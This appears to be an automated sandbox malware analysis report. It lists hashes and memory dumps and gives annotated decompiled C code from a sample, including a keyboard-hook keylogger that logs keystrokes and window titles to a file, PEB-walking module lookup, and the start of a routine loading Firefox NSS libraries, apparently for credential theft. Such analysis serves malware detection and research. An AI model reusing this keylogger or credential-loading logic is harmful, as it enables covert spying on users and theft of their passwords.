                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 940939e4bd13f0287124b6da9b8e99d7d471d9685142fc905d3a88637cfab6e7
                                      • Instruction ID: 13b677296bfc5a4b3f2af3cc5ac641c62cba9006053c75cac9a311d20ebc5edf
                                      • Opcode Fuzzy Hash: 940939e4bd13f0287124b6da9b8e99d7d471d9685142fc905d3a88637cfab6e7
                                      • Instruction Fuzzy Hash: 5E1148327146110A972CA83E4D17067FBCBD3CD110B88A83FE49FCB795E425E70A4A80
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, Offset: 00410000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_410000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 940939e4bd13f0287124b6da9b8e99d7d471d9685142fc905d3a88637cfab6e7
                                      • Instruction ID: 5d7b678f32f471edea6b8f751991fc8f028a3388fbee5f78be4d19bed80609b6
                                      • Opcode Fuzzy Hash: 940939e4bd13f0287124b6da9b8e99d7d471d9685142fc905d3a88637cfab6e7
                                      • Instruction Fuzzy Hash: 5D1148323146150A972C983E4D570A7FBCAD3C9211788893FE8ABCB795E425E74B4680
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, Offset: 00410000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_410000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 52d6af32f81210a7d8c2339af9eb0079fa52d88a47775c7bbb03b4768aeb6e14
                                      • Instruction ID: 7b15328df2af75db559bf259533e4a5d313724d3e5d4247a2dedf55fd82518cf
                                      • Opcode Fuzzy Hash: 52d6af32f81210a7d8c2339af9eb0079fa52d88a47775c7bbb03b4768aeb6e14
                                      • Instruction Fuzzy Hash: 7F01B16A54C6C2EFC7228F34A864043BFB45E8F3143DA2AD9C5D08F193C6119482DB00
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, Offset: 00410000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_410000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: de713413ae30e9bbd629b1ce9e9688af373d2f3a06129fa7c1a59eb67a33a478
                                      • Instruction ID: 7cc2303b56d5d71188f65a3d79b5ccb5c72332d3f4c64af10068287d283dc5cf
                                      • Opcode Fuzzy Hash: de713413ae30e9bbd629b1ce9e9688af373d2f3a06129fa7c1a59eb67a33a478
                                      • Instruction Fuzzy Hash: 4001B16A54C6C2EFC7228F34A460043BFA05E8F3143DA2AD9C5D08F193C6119482DB01
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 69b3ff5fd1344fc2f5de9ce969d2b5a23f5395e665722d9f0df2243ff16b4716
                                      • Instruction ID: 632a706e5a1c833ba47ae9e241841dccfa014f5d826484bcfd59d9f5044c8d9e
                                      • Opcode Fuzzy Hash: 69b3ff5fd1344fc2f5de9ce969d2b5a23f5395e665722d9f0df2243ff16b4716
                                      • Instruction Fuzzy Hash: BBE08C72915228EBC728DBCCD948E9AF3ECEB09B10B15019AF908D3600C270DE00D7D0
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      C-Code - Quality: 100%
                                      			// Editor's annotation: instruction addresses from the report's spilled right-hand column are
                                      			// restored as trailing comments. fs:[0x30] is the PEB on 32-bit Windows; PEB+0xc is Ldr and
                                      			// Ldr+0x14 is InMemoryOrderModuleList, so this walks the loaded-module list, hands each entry's
                                      			// BaseDllName buffer (+0x28 from the list links) to E0043E67C, and returns the DllBase (+0x10) on a match.
                                      			E0043E5BE() {
                                      				intOrPtr* _t10;
                                      				intOrPtr* _t11;
                                      
                                      				_t10 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x14;                    // 0x0043e5c9  (&Ldr->InMemoryOrderModuleList)
                                      				_t11 =  *_t10;                                                       // 0x0043e5cc  (first entry)
                                      				while(_t11 != _t10) {                                                // 0x0043e5de
                                      					if(E0043E67C( *((intOrPtr*)(_t11 + 0x28))) == 0) {                  // 0x0043e5da
                                      						return  *((intOrPtr*)(_t11 + 0x10));                                // 0x00000000  (DllBase)
                                      					}                                                                    // 0x0043e5e7
                                      					_t11 =  *_t11;                                                       // 0x0043e5dc  (Flink)
                                      				}                                                                    // 0x0043e5dc
                                      				return 0;                                                            // 0x00000000
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                      • Instruction ID: 54a699f0b59ceb71f229aea482801fb5e28009376276aaa164a769b86927bb4f
                                      • Opcode Fuzzy Hash: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                      • Instruction Fuzzy Hash: 14E08C332025509BC620DB5BD400A57B3B5EB98378F2A186AE44A97681E728FC02CA94
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, Offset: 00410000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_410000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                      • Instruction ID: b5c47114fbbcb4bb190c7ec61b3bf22c24edcb30a80f12f7c1cd8c7b7d671595
                                      • Opcode Fuzzy Hash: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                      • Instruction Fuzzy Hash: 30E08C73A005108BC620DF19D800A92F3F5EF8037072A046AE44793640C328FE83CA58
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      C-Code - Quality: 100%
                                      			// Editor's annotation: instruction addresses restored from the spilled column. Reads
                                      			// PEB->Ldr->InLoadOrderModuleList (Ldr+0xc), follows Flink twice (first entry is the image itself,
                                      			// the second is ntdll.dll) and returns that entry's DllBase (+0x18).
                                      			E0043E8EC() {
                                      				intOrPtr _t4;
                                      
                                      				_t4 =  *[fs:0x30];                                                   // 0x0043e8ec  (PEB)
                                      				if(_t4 == 0) {                                                       // 0x0043e8f4
                                      					return 0;                                                            // 0x0043e906
                                      				} else {                                                             // 0x0043e8f6
                                      					return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t4 + 0xc)) + 0xc)))))) + 0x18)); // 0x0043e903
                                      				}                                                                    // 0x0043e903
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                      • Instruction ID: d1913a6f9fc5a84ad08be9e7f2bd37d8c974a8eeaf57f50a506ac35b8a756a5e
                                      • Opcode Fuzzy Hash: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                      • Instruction Fuzzy Hash: ABD0EA78361940CFCB51CF19C584E11B3E4EB49760B098491E905CB771D738EC00EA00
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, Offset: 00410000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_410000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                      • Instruction ID: e4bd3f95ac7834bea822284dbbfe6242d103d250b8690896264215d9e20352ae
                                      • Opcode Fuzzy Hash: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                      • Instruction Fuzzy Hash: 2CD0EA387619408FCB51CF19C594E01B3E4EB49760B0984D1E905CB731D738ED40EA40
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      C-Code - Quality: 100%
                                      			// Editor's annotation: returns the PEB pointer from the TEB (fs:[0x30] on 32-bit Windows).
                                      			E0043E5B7() {
                                      
                                      				return  *[fs:0x30];                                                  // 0x0043e5bd
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                      • Instruction Fuzzy Hash:
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, Offset: 00410000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_410000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                      • Instruction Fuzzy Hash:
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      C-Code - Quality: 100%
                                      			E0043765A(signed int __ecx, int __edx, long _a4) {
                                      				signed int _v8;
                                      				int _v12;
                                      				short _v24;
                                      				short _v56;
                                      				void* _t21;
                                      				short _t24;
                                      				short _t27;
                                      				void* _t36;
                                      				int _t46;
                                      				signed int _t48;
                                      				WCHAR* _t49;
                                      				WCHAR* _t50;
                                      				long _t57;
                                      				void* _t58;
                                      				short _t59;
                                      				short _t60;
                                      				short _t62;
                                      				short _t63;
                                      				short _t64;
                                      				short _t66;
                                      				short _t67;
                                      				short _t69;
                                      				short _t70;
                                      				short _t71;
                                      				short _t73;
                                      				short _t75;
                                      				short _t77;
                                      				short _t78;
                                      				short _t79;
                                      				signed int _t81;
                                      
                                      				_t55 = __edx;
                                      				_t48 = __ecx;
                                      				_t46 = __ecx;
                                      				_v12 = __edx;
                                      				_v8 = __ecx;
                                      				_t57 = _a4;
                                      				_t21 = __edx - 0x100;
                                      				if(_t21 == 0 || _t21 == 4) {
                                      					_t58 =  *_t57;
                                      					if(_t58 < 0x27) {
                                      						__eflags = _t58 - 0x40;
                                      						if(_t58 <= 0x40) {
                                      							L21:
                                      							__eflags = _t58 - 0x66;
                                      							if(__eflags > 0) {
                                      								__eflags = _t58 - 0xbc;
                                      								if(__eflags > 0) {
                                      									__eflags = _t58 - 0xdb;
                                      									if(__eflags > 0) {
                                      										_t59 = _t58 - 0xdc;
                                      										__eflags = _t59;
                                      										if(_t59 == 0) {
                                      											_t24 = GetAsyncKeyState(0x10);
                                      											_t49 = "|";
                                      											__eflags = _t24;
                                      											if(__eflags == 0) {
                                      												_t49 = "\\";
                                      											}
                                      											L99:
                                      											E00437AEB(_t49, _t55, _t90);
                                      											goto L100;
                                      										}
                                      										_t60 = _t59 - 1;
                                      										__eflags = _t60;
                                      										if(_t60 == 0) {
                                      											_t27 = GetAsyncKeyState(0x10);
                                      											_t50 = "}";
                                      											_t55 = "]";
                                      											L76:
                                      											__eflags = _t27;
                                      											_t49 =  ==  ? _t55 : _t50;
                                      											goto L99;
                                      										}
                                      										__eflags = _t60 - 1;
                                      										if(__eflags == 0) {
                                      											_t27 = GetAsyncKeyState(0x10);
                                      											_t50 = "\"";
                                      											_t55 = "\'";
                                      											goto L76;
                                      										}
                                      										L94:
                                      										GetKeyNameTextW((( *(_t57 + 8) << 8) +  *((intOrPtr*)(_t57 + 4)) << 0x10) + 1,  &_v56, 0xf);
                                      										_t49 =  &_v56;
                                      										goto L99;
                                      									}
                                      									if(__eflags == 0) {
                                      										_t27 = GetAsyncKeyState(0x10);
                                      										_t50 = "{";
                                      										_t55 = "[";
                                      										goto L76;
                                      									}
                                      									_t62 = _t58 - 0xbd;
                                      									__eflags = _t62;
                                      									if(_t62 == 0) {
                                      										_t27 = GetAsyncKeyState(0x10);
                                      										_t50 = "_";
                                      										_t55 = "-";
                                      										goto L76;
                                      									}
                                      									_t63 = _t62 - 1;
                                      									__eflags = _t63;
                                      									if(_t63 == 0) {
                                      										_t27 = GetAsyncKeyState(0x10);
                                      										_t50 = ">";
                                      										_t55 = ".";
                                      										goto L76;
                                      									}
                                      									_t64 = _t63 - 1;
                                      									__eflags = _t64;
                                      									if(_t64 == 0) {
                                      										_t27 = GetAsyncKeyState(0x10);
                                      										_t50 = "?";
                                      										_t55 = "/";
                                      										goto L76;
                                      									}
                                      									__eflags = _t64 - 1;
                                      									if(__eflags != 0) {
                                      										goto L94;
                                      									}
                                      									_t27 = GetAsyncKeyState(0x10);
                                      									_t50 = "~";
                                      									_t55 = "`";
                                      									goto L76;
                                      								}
                                      								if(__eflags == 0) {
                                      									_t27 = GetAsyncKeyState(0x10);
                                      									_t50 = "<";
                                      									_t55 = ",";
                                      									goto L76;
                                      								}
                                      								__eflags = _t58 - 0xa3;
                                      								if(_t58 > 0xa3) {
                                      									__eflags = _t58 - 0xa5;
                                      									if(__eflags <= 0) {
                                      										L78:
                                      										_t49 = L"[ALT]";
                                      										goto L99;
                                      									}
                                      									__eflags = _t58 - 0xba;
                                      									if(_t58 == 0xba) {
                                      										_t27 = GetAsyncKeyState(0x10);
                                      										_t50 = ":";
                                      										_t55 = ";";
                                      										goto L76;
                                      									}
                                      									__eflags = _t58 - 0xbb;
                                      									if(__eflags != 0) {
                                      										goto L94;
                                      									}
                                      									_t27 = GetAsyncKeyState(0x10);
                                      									_t50 = "+";
                                      									_t55 = "=";
                                      									goto L76;
                                      								}
                                      								__eflags = _t58 - 0xa2;
                                      								if(__eflags >= 0) {
                                      									L71:
                                      									_t49 = L"[CTRL]";
                                      									goto L99;
                                      								}
                                      								__eflags = _t58 - 0x67;
                                      								if(__eflags == 0) {
                                      									_t49 = "7";
                                      									goto L99;
                                      								}
                                      								__eflags = _t58 - 0x68;
                                      								if(__eflags == 0) {
                                      									_t49 = "8";
                                      									goto L99;
                                      								}
                                      								__eflags = _t58 - 0x69;
                                      								if(__eflags == 0) {
                                      									_t49 = "9";
                                      									goto L99;
                                      								}
                                      								__eflags = _t58 - 0xa0 - 1;
                                      								if(__eflags > 0) {
                                      									goto L94;
                                      								}
                                      								goto L100;
                                      							}
                                      							if(__eflags == 0) {
                                      								_t49 = "6";
                                      								goto L99;
                                      							}
                                      							__eflags = _t58 - 0x20;
                                      							if(__eflags > 0) {
                                      								__eflags = _t58 - 0x62;
                                      								if(__eflags > 0) {
                                      									_t66 = _t58 - 0x63;
                                      									__eflags = _t66;
                                      									if(__eflags == 0) {
                                      										_t49 = "3";
                                      										goto L99;
                                      									}
                                      									_t67 = _t66 - 1;
                                      									__eflags = _t67;
                                      									if(__eflags == 0) {
                                      										_t49 = "4";
                                      										goto L99;
                                      									}
                                      									__eflags = _t67 - 1;
                                      									if(__eflags != 0) {
                                      										goto L94;
                                      									}
                                      									_t49 = "5";
                                      									goto L99;
                                      								}
                                      								if(__eflags == 0) {
                                      									_t49 = "2";
                                      									goto L99;
                                      								}
                                      								_t69 = _t58 - 0x2d;
                                      								__eflags = _t69;
                                      								if(__eflags == 0) {
                                      									_t49 = L"[INSERT]";
                                      									goto L99;
                                      								}
                                      								_t70 = _t69 - 1;
                                      								__eflags = _t70;
                                      								if(__eflags == 0) {
                                      									_t49 = L"[DEL]";
                                      									goto L99;
                                      								}
                                      								_t71 = _t70 - 0x32;
                                      								__eflags = _t71;
                                      								if(__eflags == 0) {
                                      									_t49 = "0";
                                      									goto L99;
                                      								}
                                      								__eflags = _t71 - 1;
                                      								if(__eflags != 0) {
                                      									goto L94;
                                      								}
                                      								_t49 = "1";
                                      								goto L99;
                                      							}
                                      							if(__eflags == 0) {
                                      								_t49 = " ";
                                      								goto L99;
                                      							}
                                      							__eflags = _t58 - 0x11;
                                      							if(__eflags > 0) {
                                      								_t73 = _t58 - 0x12;
                                      								__eflags = _t73;
                                      								if(__eflags == 0) {
                                      									goto L78;
                                      								}
                                      								_t75 = _t73;
                                      								__eflags = _t75;
                                      								if(__eflags == 0) {
                                      									_t49 = L"[CAPS]";
                                      									goto L99;
                                      								}
                                      								__eflags = _t75 - 7;
                                      								if(__eflags != 0) {
                                      									goto L94;
                                      								}
                                      								_t49 = L"[ESC]";
                                      								goto L99;
                                      							}
                                      							if(__eflags == 0) {
                                      								goto L71;
                                      							}
                                      							_t77 = _t58 - 8;
                                      							__eflags = _t77;
                                      							if(__eflags == 0) {
                                      								_t49 = L"[BKSP]";
                                      								goto L99;
                                      							}
                                      							_t78 = _t77 - 1;
                                      							__eflags = _t78;
                                      							if(__eflags == 0) {
                                      								_t49 = L"[TAB]";
                                      								goto L99;
                                      							}
                                      							_t79 = _t78 - 4;
                                      							__eflags = _t79;
                                      							if(__eflags == 0) {
                                      								_t49 = L"[ENTER]\r\n";
                                      								goto L99;
                                      							}
                                      							__eflags = _t79 - 3;
                                      							if(__eflags == 0) {
                                      								goto L100;
                                      							}
                                      							goto L94;
                                      						}
                                      						L19:
                                      						__eflags = _t58 - 0x5b;
                                      						if(_t58 >= 0x5b) {
                                      							goto L21;
                                      						}
                                      						_t36 = E00437AE0();
                                      						__eflags = GetAsyncKeyState(0x10);
                                      						__eflags = E00437ACE(_t48 & 0xffffff00 | GetAsyncKeyState(0x10) != 0x00000000, _t36);
                                      						_t53 =  !=  ? _t58 : _t58 + 0x20;
                                      						wsprintfW( &_v24, L"%c",  !=  ? _t58 : _t58 + 0x20);
                                      						E00437AEB( &_v24, _t36, __eflags);
                                      						_t46 = _v8;
                                      						goto L100;
                                      					}
                                      					if(_t58 > 0x40) {
                                      						goto L19;
                                      					}
                                      					if(GetAsyncKeyState(0x10) == 0) {
                                      						wsprintfW( &_v24, L"%c", _t58);
                                      						_t49 =  &_v24;
                                      						goto L99;
                                      					}
                                      					_t81 = _t58 + 0xffffffd0;
                                      					_t90 = _t81 - 9;
                                      					if(_t81 > 9) {
                                      						goto L100;
                                      					}
                                      					switch( *((intOrPtr*)(_t81 * 4 +  &M00437AA6))) {
                                      						case 0:
                                      							_t49 = ")";
                                      							goto L99;
                                      						case 1:
                                      							__ecx = "!";
                                      							goto L99;
                                      						case 2:
                                      							__ecx = "@";
                                      							goto L99;
                                      						case 3:
                                      							__ecx = "#";
                                      							goto L99;
                                      						case 4:
                                      							__ecx = "$";
                                      							goto L99;
                                      						case 5:
                                      							__ecx = "%";
                                      							goto L99;
                                      						case 6:
                                      							__ecx = "^";
                                      							goto L99;
                                      						case 7:
                                      							__ecx = "&";
                                      							goto L99;
                                      						case 8:
                                      							__ecx = "*";
                                      							goto L99;
                                      						case 9:
                                      							__ecx = "(";
                                      							goto L99;
                                      					}
                                      				} else {
                                      					L100:
                                      					return CallNextHookEx(0, _t46, _v12, _t57);
                                      				}
                                      			}
                                      0x004377a8
                                      0x004377d6
                                      0x00000000
                                      0x004377d6
                                      0x004377aa
                                      0x004377aa
                                      0x004377ad
                                      0x004377cc
                                      0x00000000
                                      0x004377cc
                                      0x004377af
                                      0x004377af
                                      0x004377b2
                                      0x004377c2
                                      0x00000000
                                      0x004377c2
                                      0x004377b4
                                      0x004377b7
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004377bd
                                      0x00437738
                                      0x00437738
                                      0x0043773b
                                      0x00000000
                                      0x00000000
                                      0x0043773d
                                      0x0043774c
                                      0x00437759
                                      0x00437761
                                      0x0043776b
                                      0x00437777
                                      0x0043777c
                                      0x00000000
                                      0x0043777c
                                      0x0043768e
                                      0x00000000
                                      0x00000000
                                      0x0043769f
                                      0x00437722
                                      0x0043772b
                                      0x00000000
                                      0x0043772b
                                      0x004376a1
                                      0x004376a4
                                      0x004376a7
                                      0x00000000
                                      0x00000000
                                      0x004376ad
                                      0x00000000
                                      0x004376b4
                                      0x00000000
                                      0x00000000
                                      0x004376be
                                      0x00000000
                                      0x00000000
                                      0x004376c8
                                      0x00000000
                                      0x00000000
                                      0x004376d2
                                      0x00000000
                                      0x00000000
                                      0x004376dc
                                      0x00000000
                                      0x00000000
                                      0x004376e6
                                      0x00000000
                                      0x00000000
                                      0x004376f0
                                      0x00000000
                                      0x00000000
                                      0x004376fa
                                      0x00000000
                                      0x00000000
                                      0x00437704
                                      0x00000000
                                      0x00000000
                                      0x0043770e
                                      0x00000000
                                      0x00000000
                                      0x00437a90
                                      0x00437a90
                                      0x00437aa1
                                      0x00437aa1

                                      APIs
                                      • GetAsyncKeyState.USER32(00000010), ref: 00437696
                                      • CallNextHookEx.USER32(00000000,?,?,?), ref: 00437A97
                                        • Part of subcall function 00437AEB: GetForegroundWindow.USER32 ref: 00437B14
                                        • Part of subcall function 00437AEB: GetWindowTextW.USER32(00000000,?,00000104), ref: 00437B27
                                        • Part of subcall function 00437AEB: lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 00437B90
                                        • Part of subcall function 00437AEB: CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000), ref: 00437BFE
                                        • Part of subcall function 00437AEB: lstrlenW.KERNEL32(004429A0,00000008,00000000,?,?), ref: 00437C27
                                        • Part of subcall function 00437AEB: WriteFile.KERNEL32(?,004429A0,00000000,?,?), ref: 00437C33
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileWindowlstrlen$AsyncCallCreateForegroundHookNextStateTextWrite
                                      • String ID: D&D$[ALT]$[BKSP]$[CAPS]$[CTRL]$[DEL]$[ENTER]$[ESC]$[INSERT]$[TAB]$|*D$*D$*D$*D$*D
                                      • API String ID: 2452648998-840773365
                                      • Opcode ID: 73d1c7d664325cbde4d1cc3a340fc9e6f6c49df9da99b8f92495fb75de3c1881
                                      • Instruction ID: 1e34032bf513de26f9a8765f6988a01378d18145d1f7904321486f9cdeb8a926
                                      • Opcode Fuzzy Hash: 73d1c7d664325cbde4d1cc3a340fc9e6f6c49df9da99b8f92495fb75de3c1881
                                      • Instruction Fuzzy Hash: 3F91E2E1A0C115A7F6386258475867E3A51AB4D300FA0A277FAD377BA0C7DC0E42979F
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 98%
                                      			E0043A324(void* __ecx, void* __edx, WCHAR* _a4) {
                                      				WCHAR* _v8;
                                      				long _v12;
                                      				WCHAR* _v16;
                                      				WCHAR* _v20;
                                      				char _v24;
                                      				char _v28;
                                      				WCHAR* _v32;
                                      				WCHAR* _v36;
                                      				WCHAR* _v40;
                                      				short _v560;
                                      				struct HINSTANCE__* _t135;
                                      				WCHAR* _t158;
                                      				intOrPtr _t194;
                                      				void* _t206;
                                      				void* _t216;
                                      				void* _t218;
                                      
                                      				_t206 = __edx;
                                      				_t158 = 0;
                                      				_t216 = __ecx;
                                      				E00431052( &_v560, 0, 0x104);
                                      				GetCurrentDirectoryW(0x104,  &_v560);
                                      				SetCurrentDirectoryW(_a4);
                                      				E00433297( &_a4, _t206, 0, "\\");
                                      				E0043345A( &_v40,  &_a4);
                                      				E00433297( &_v40, _t206, 0, L"nss3.dll");
                                      				E0043345A( &_v20,  &_a4);
                                      				E00433297( &_v20, _t206, 0, L"msvcr120.dll");
                                      				E0043345A( &_v16,  &_a4);
                                      				E00433297( &_v16, _t206, 0, L"msvcp120.dll");
                                      				E0043345A( &_v36,  &_a4);
                                      				E00433297( &_v36, _t206, 0, L"mozglue.dll");
                                      				E0043345A( &_v32,  &_a4);
                                      				E00433297( &_v32, _t206, 0, L"softokn3.dll");
                                      				E0043345A( &_v28,  &_a4);
                                      				E00433297( &_v28, _t206, 0, L"msvcp");
                                      				E0043345A( &_v24,  &_a4);
                                      				E00433297( &_v24, _t206, 0, L"msvcr");
                                      				_t218 = 0x5a;
                                      				_v12 = 0x104;
                                      				while(1) {
                                      					E0043345A( &_v8,  &_v28);
                                      					E00433297(E0043309F( &_v8, _t206, 0, _v12), _t206, 0, L".dll");
                                      					if(PathFileExistsW(_v8) != 0) {
                                      						break;
                                      					}
                                      					_v12 = _v12 + 0xa;
                                      					E00435A2D(_v8);
                                      					_t224 = _v12 - 0x96;
                                      					_v8 = _t158;
                                      					if(_v12 != 0x96) {
                                      						continue;
                                      					} else {
                                      						while(1) {
                                      							L5:
                                      							E0043345A( &_v8,  &_v24);
                                      							E00433297(E0043309F( &_v8, _t206, _t224, _t218), _t206, _t224, L".dll");
                                      							if(PathFileExistsW(_v8) != 0) {
                                      								break;
                                      							}
                                      							_t218 = _t218 + 0xa;
                                      							E00435A2D(_v8);
                                      							_v8 = _t158;
                                      							if(_t218 != 0x96) {
                                      								continue;
                                      							}
                                      							L9:
                                      							 *((intOrPtr*)(_t216 + 0xa8)) = LoadLibraryW(_v20);
                                      							 *((intOrPtr*)(_t216 + 0xac)) = LoadLibraryW(_v16);
                                      							 *((intOrPtr*)(_t216 + 0xb0)) = LoadLibraryW(_v36);
